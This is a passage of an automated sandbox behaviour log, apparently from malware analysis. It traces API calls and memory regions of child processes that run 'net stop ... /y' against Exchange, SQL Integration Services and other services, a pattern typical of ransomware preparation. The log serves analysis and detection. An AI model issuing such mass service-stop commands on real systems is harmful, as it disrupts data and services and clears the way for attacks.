(normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6610 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6611 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6612 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6613 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6614 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6615 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6616 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6617 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6618 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6619 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6620 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6636 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 575 os_tid = 0x11bc [0100.245] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fdd0 | out: lpSystemTimeAsFileTime=0x20fdd0*(dwLowDateTime=0xf0ea6650, dwHighDateTime=0x1d48689)) [0100.245] GetCurrentProcessId () returned 0x1228 [0100.245] GetCurrentThreadId () returned 0x11bc [0100.245] GetTickCount () returned 0x22d75 [0100.245] QueryPerformanceCounter (in: lpPerformanceCount=0x20fdd8 | out: lpPerformanceCount=0x20fdd8*=1814716400000) returned 1 [0100.247] GetModuleHandleW (lpModuleName=0x0) returned 0xffae0000 [0100.247] __set_app_type (_Type=0x1) [0100.247] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffaf9c9c) returned 0x0 [0100.247] __getmainargs (in: _Argc=0xffb04780, _Argv=0xffb04790, _Env=0xffb04788, _DoWildCard=0, _StartInfo=0xffb0479c | out: _Argc=0xffb04780, _Argv=0xffb04790, _Env=0xffb04788) returned 0 [0100.247] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.248] GetConsoleOutputCP () returned 0x1b5 [0100.271] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb0cec0 | out: lpCPInfo=0xffb0cec0) returned 1 [0100.271] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.273] sprintf_s (in: _DstBuf=0x20fd78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0100.274] setlocale (category=0, locale=".437") returned="English_United States.437" [0100.275] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0100.275] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0100.275] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MMS /y" [0100.275] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20fb10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0100.275] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0100.275] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fd68 | out: Buffer=0x20fd68*=0x64d40) returned 0x0 [0100.276] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20fd68 | out: Buffer=0x20fd68*=0x6c0e0) returned 0x0 [0100.276] _fileno (_File=0x7fefdba2a80) returned 0 [0100.276] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0100.276] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0100.276] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0100.276] _wcsicmp (_String1="config", _String2="stop") returned -16 [0100.276] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0100.276] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0100.276] _wcsicmp (_String1="file", _String2="stop") returned -13 [0100.276] _wcsicmp (_String1="files", _String2="stop") returned -13 [0100.277] _wcsicmp (_String1="group", _String2="stop") returned -12 [0100.277] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0100.277] _wcsicmp (_String1="help", _String2="stop") returned -11 [0100.277] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0100.277] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0100.277] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0100.277] _wcsicmp (_String1="session", _String2="stop") returned -15 [0100.277] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0100.277] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0100.277] _wcsicmp (_String1="share", _String2="stop") returned -12 [0100.277] _wcsicmp (_String1="start", _String2="stop") returned -14 [0100.277] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0100.277] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0100.277] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0100.277] _wcsicmp (_String1="accounts", _String2="MMS") returned -12 [0100.277] _wcsicmp (_String1="computer", _String2="MMS") returned -10 [0100.277] _wcsicmp (_String1="config", _String2="MMS") returned -10 [0100.277] _wcsicmp (_String1="continue", _String2="MMS") returned -10 [0100.277] _wcsicmp (_String1="cont", _String2="MMS") returned -10 [0100.277] _wcsicmp (_String1="file", _String2="MMS") returned -7 [0100.278] _wcsicmp (_String1="files", _String2="MMS") returned -7 [0100.278] _wcsicmp (_String1="group", _String2="MMS") returned -6 [0100.278] _wcsicmp (_String1="groups", _String2="MMS") returned -6 [0100.278] _wcsicmp (_String1="help", _String2="MMS") returned -5 [0100.278] _wcsicmp (_String1="helpmsg", _String2="MMS") returned -5 [0100.278] _wcsicmp (_String1="localgroup", _String2="MMS") returned -1 [0100.278] _wcsicmp (_String1="pause", _String2="MMS") returned 3 [0100.278] _wcsicmp (_String1="session", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="sessions", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="sess", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="share", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="start", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="stats", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="statistics", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="stop", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="time", _String2="MMS") returned 7 [0100.278] _wcsicmp (_String1="user", _String2="MMS") returned 8 [0100.278] _wcsicmp (_String1="users", _String2="MMS") returned 8 [0100.278] _wcsicmp (_String1="msg", _String2="MMS") returned 6 [0100.278] _wcsicmp (_String1="messenger", _String2="MMS") returned -8 [0100.278] _wcsicmp (_String1="receiver", _String2="MMS") returned 5 [0100.279] _wcsicmp (_String1="rcv", _String2="MMS") returned 5 [0100.279] _wcsicmp (_String1="netpopup", _String2="MMS") returned 1 [0100.279] _wcsicmp (_String1="redirector", _String2="MMS") returned 5 [0100.279] _wcsicmp (_String1="redir", _String2="MMS") returned 5 [0100.279] _wcsicmp (_String1="rdr", _String2="MMS") returned 5 [0100.279] _wcsicmp (_String1="workstation", _String2="MMS") returned 10 [0100.279] _wcsicmp (_String1="work", _String2="MMS") returned 10 [0100.279] _wcsicmp (_String1="wksta", _String2="MMS") returned 10 [0100.279] _wcsicmp (_String1="prdr", _String2="MMS") returned 3 [0100.279] _wcsicmp (_String1="devrdr", _String2="MMS") returned -9 [0100.279] _wcsicmp (_String1="lanmanworkstation", _String2="MMS") returned -1 [0100.279] _wcsicmp (_String1="server", _String2="MMS") returned 6 [0100.279] _wcsicmp (_String1="svr", _String2="MMS") returned 6 [0100.279] _wcsicmp (_String1="srv", _String2="MMS") returned 6 [0100.279] _wcsicmp (_String1="lanmanserver", _String2="MMS") returned -1 [0100.279] _wcsicmp (_String1="alerter", _String2="MMS") returned -12 [0100.279] _wcsicmp (_String1="netlogon", _String2="MMS") returned 1 [0100.279] _wcsupr (in: _String="MMS" | out: _String="MMS") returned="MMS" [0100.280] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6c900 [0100.284] GetServiceKeyNameW (in: hSCManager=0x6c900, lpDisplayName="MMS", lpServiceName=0xffb05750, lpcchBuffer=0x20fc88 | out: lpServiceName="", lpcchBuffer=0x20fc88) returned 0 [0100.285] _wcsicmp (_String1="msg", _String2="MMS") returned 6 [0100.285] _wcsicmp (_String1="messenger", _String2="MMS") returned -8 [0100.285] _wcsicmp (_String1="receiver", _String2="MMS") returned 5 [0100.285] _wcsicmp (_String1="rcv", _String2="MMS") returned 5 [0100.285] _wcsicmp (_String1="redirector", _String2="MMS") returned 5 [0100.285] _wcsicmp (_String1="redir", _String2="MMS") returned 5 [0100.285] _wcsicmp (_String1="rdr", _String2="MMS") returned 5 [0100.285] _wcsicmp (_String1="workstation", _String2="MMS") returned 10 [0100.285] _wcsicmp (_String1="work", _String2="MMS") returned 10 [0100.285] _wcsicmp (_String1="wksta", _String2="MMS") returned 10 [0100.285] _wcsicmp (_String1="prdr", _String2="MMS") returned 3 [0100.285] _wcsicmp (_String1="devrdr", _String2="MMS") returned -9 [0100.285] _wcsicmp (_String1="lanmanworkstation", _String2="MMS") returned -1 [0100.285] _wcsicmp (_String1="server", _String2="MMS") returned 6 [0100.285] _wcsicmp (_String1="svr", _String2="MMS") returned 6 [0100.286] _wcsicmp (_String1="srv", _String2="MMS") returned 6 [0100.286] _wcsicmp (_String1="lanmanserver", _String2="MMS") returned -1 [0100.286] _wcsicmp (_String1="alerter", _String2="MMS") returned -12 [0100.286] _wcsicmp (_String1="netlogon", _String2="MMS") returned 1 [0100.286] NetServiceControl (in: servername=0x0, service="MMS", opcode=0x0, arg=0x0, bufptr=0x20fc90 | out: bufptr=0x20fc90) returned 0x889 [0100.287] wcscpy_s (in: _Destination=0xffb080d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0100.287] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0100.287] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb05b50, nSize=0x800, Arguments=0xffb07f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0100.289] GetFileType (hFile=0xb) returned 0x2 [0100.289] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb58 | out: lpMode=0x20fb58) returned 1 [0100.289] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb05b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20fb50, lpReserved=0x0 | out: lpBuffer=0xffb05b50*, lpNumberOfCharsWritten=0x20fb50*=0x1e) returned 1 [0100.290] GetFileType (hFile=0xb) returned 0x2 [0100.290] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb58 | out: lpMode=0x20fb58) returned 1 [0100.290] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffae1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fb50, lpReserved=0x0 | out: lpBuffer=0xffae1efc*, lpNumberOfCharsWritten=0x20fb50*=0x2) returned 1 [0100.290] _ultow (in: _Dest=0x889, _Radix=2161600 | out: _Dest=0x889) returned="2185" [0100.291] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb05b50, nSize=0x800, Arguments=0xffb07f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0100.291] GetFileType (hFile=0xb) returned 0x2 [0100.291] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb58 | out: lpMode=0x20fb58) returned 1 [0100.291] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb05b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20fb50, lpReserved=0x0 | out: lpBuffer=0xffb05b50*, lpNumberOfCharsWritten=0x20fb50*=0x34) returned 1 [0100.292] GetFileType (hFile=0xb) returned 0x2 [0100.292] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20fb58 | out: lpMode=0x20fb58) returned 1 [0100.292] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffae1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20fb50, lpReserved=0x0 | out: lpBuffer=0xffae1efc*, lpNumberOfCharsWritten=0x20fb50*=0x2) returned 1 [0100.292] NetApiBufferFree (Buffer=0x64d40) returned 0x0 [0100.292] NetApiBufferFree (Buffer=0x6c0e0) returned 0x0 [0100.293] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MMS /y" [0100.293] exit (_Code=2) Process: id = "151" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x56f2c000" os_pid = "0x12c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MsDtsServer110 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6621 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6622 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6623 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6624 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6625 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6626 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6627 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6628 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6629 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6630 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6631 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6632 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6633 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6634 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6635 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 576 os_tid = 0x12c8 Process: id = "152" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x57f4b000" os_pid = "0x9e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSExchangeES /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6637 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6638 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6639 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6640 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6641 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6642 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6643 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6644 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6645 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6646 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6647 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 6648 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6649 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 6650 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6651 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 578 os_tid = 0x11f4 Process: id = "153" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5696a000" os_pid = "0x11d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSExchangeIS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6672 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6673 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6674 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6675 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6676 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6677 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6678 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6679 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6680 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6681 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6682 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6683 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6684 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 6685 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6686 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 580 os_tid = 0x1230 Process: id = "154" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x587c4000" os_pid = "0x127c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "148" os_parent_pid = "0x1218" cmd_line = "C:\\Windows\\system32\\net1 stop MsDtsServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6687 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6688 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6689 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6690 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6691 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6692 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6693 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6694 start_va = 0xffe60000 end_va = 0xffe92fff entry_point = 0xffe60000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6695 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6696 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6697 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6698 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6699 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6700 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6701 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6702 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6703 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6704 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6705 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 6706 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6707 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = 